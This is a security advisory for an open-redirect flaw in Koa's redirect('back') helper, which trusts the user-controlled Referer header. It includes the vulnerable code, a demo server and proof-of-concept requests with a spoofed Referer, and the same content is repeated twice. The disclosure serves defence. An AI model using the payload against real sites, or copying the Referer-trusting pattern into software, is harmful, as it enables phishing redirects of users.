Headline
GHSA-jgmv-j7ww-jx2x: Koa Open Redirect via Referrer Header (User-Controlled)
Summary
In the latest version of Koa, the back method used for redirect operations adopts an insecure implementation, which uses the user-controllable referrer header as the redirect target.
Details
on the API document https://www.koajs.net/api/response#responseredirecturl-alt, we can see:
response.redirect(url, [alt])
Performs a [302] redirect to url.
The string "back" is specially provided for Referrer support, using alt or "/" when Referrer does not exist.
ctx.redirect('back');
ctx.redirect('back', '/index.html');
ctx.redirect('/login');
ctx.redirect('http://google.com');
however, the “back” method is insecure:
- https://github.com/koajs/koa/blob/master/lib/response.js#L322
back (alt) {
const url = this.ctx.get('Referrer') || alt || '/'
this.redirect(url)
},
Referrer Header is User-Controlled.
PoC
there is a demo for POC:
const Koa = require('koa')
const serve = require('koa-static')
const Router = require('@koa/router')
const path = require('path')
const app = new Koa()
const router = new Router()
// Serve static files from the public directory
app.use(serve(path.join(__dirname, 'public')))
// Define routes
router.get('/test', ctx => {
ctx.redirect('back', '/index1.html')
})
router.get('/test2', ctx => {
ctx.redirect('back')
})
router.get('/', ctx => {
ctx.body = 'Welcome to the home page! Try accessing /test, /test2'
})
app.use(router.routes())
app.use(router.allowedMethods())
const port = 3000
app.listen(port, () => {
console.log(`Server running at http://localhost:${port}`)
})
Proof Of Concept
GET /test HTTP/1.1
Host: 127.0.0.1:3000
Referer: http://www.baidu.com
Connection: close
GET /test2 HTTP/1.1
Host: 127.0.0.1:3000
Referer: http://www.baidu.com
Connection: close
Impact
https://learn.snyk.io/lesson/open-redirect/
Summary
In the latest version of Koa, the back method used for redirect operations adopts an insecure implementation, which uses the user-controllable referrer header as the redirect target.
Details
on the API document https://www.koajs.net/api/response#responseredirecturl-alt, we can see:
response.redirect(url, [alt])
Performs a [302] redirect to url.
The string "back" is specially provided for Referrer support, using alt or "/" when Referrer does not exist.
ctx.redirect('back');
ctx.redirect('back', '/index.html');
ctx.redirect('/login');
ctx.redirect('http://google.com');
however, the “back” method is insecure:
https://github.com/koajs/koa/blob/master/lib/response.js#L322
back (alt) { const url = this.ctx.get(‘Referrer’) || alt || ‘/’ this.redirect(url) },
Referrer Header is User-Controlled.
PoC
there is a demo for POC:
const Koa = require('koa')
const serve = require('koa-static')
const Router = require('@koa/router')
const path = require('path')
const app = new Koa()
const router = new Router()
// Serve static files from the public directory
app.use(serve(path.join(__dirname, 'public')))
// Define routes
router.get('/test', ctx => {
ctx.redirect('back', '/index1.html')
})
router.get('/test2', ctx => {
ctx.redirect('back')
})
router.get('/', ctx => {
ctx.body = 'Welcome to the home page! Try accessing /test, /test2'
})
app.use(router.routes())
app.use(router.allowedMethods())
const port = 3000
app.listen(port, () => {
console.log(`Server running at http://localhost:${port}`)
})
Proof Of Concept
GET /test HTTP/1.1
Host: 127.0.0.1:3000
Referer: http://www.baidu.com
Connection: close
GET /test2 HTTP/1.1
Host: 127.0.0.1:3000
Referer: http://www.baidu.com
Connection: close
Impact
https://learn.snyk.io/lesson/open-redirect/
References
- GHSA-jgmv-j7ww-jx2x
- https://nvd.nist.gov/vuln/detail/CVE-2025-54420
- koajs/koa#1892
- koajs/koa#1892 (comment)
- koajs/koa@422c551
- https://vuldb.com/?ctiid.317514
- https://vuldb.com/?id.317514
- https://vuldb.com/?submit.619741
Related news
A vulnerability, which was classified as problematic, was found in KoaJS Koa up to 3.0.0. Affected is the function back in the library lib/response.js of the component HTTP Header Handler. The manipulation of the argument Referrer leads to open redirect. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.